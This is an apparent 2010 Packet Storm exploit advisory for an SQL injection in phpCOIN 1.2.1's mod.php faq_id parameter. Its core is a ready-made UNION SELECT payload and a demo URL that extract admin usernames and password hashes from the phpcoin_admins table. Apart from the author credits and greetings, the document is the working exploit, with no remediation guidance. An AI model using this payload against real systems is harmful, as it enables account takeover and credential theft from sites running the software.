phpCOIN 1.2.1 SQL Injection

2010-02-25T00:00:00
ID PACKETSTORM:86683
Type packetstorm
Reporter Baybora
Modified 2010-02-25T00:00:00

Description

                                        
                                            `phpCOIN 1.2.1 (mod.php) SQL Injection Vulnerability  
  
###########################  
  
Author : Baybora  
  
Homepage : http://www.1923turk.com  
  
Blog : http://baybora.wordpress.com/  
  
Script : phpCOIN 1.2.1  
  
Download : http://www.phpcoin.com/  
  
###########################   
  
[ Vulnerable File ]  
  
mod.php?mod=faq&mode=show&faq_id= [ SQL ]  
  
  
[ XpL ]  
  
-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--  
  
  
[ Demo]  
  
  
http://serverbilling/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--  
  
  
##############################################################   
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO   
##############################################################  
  
`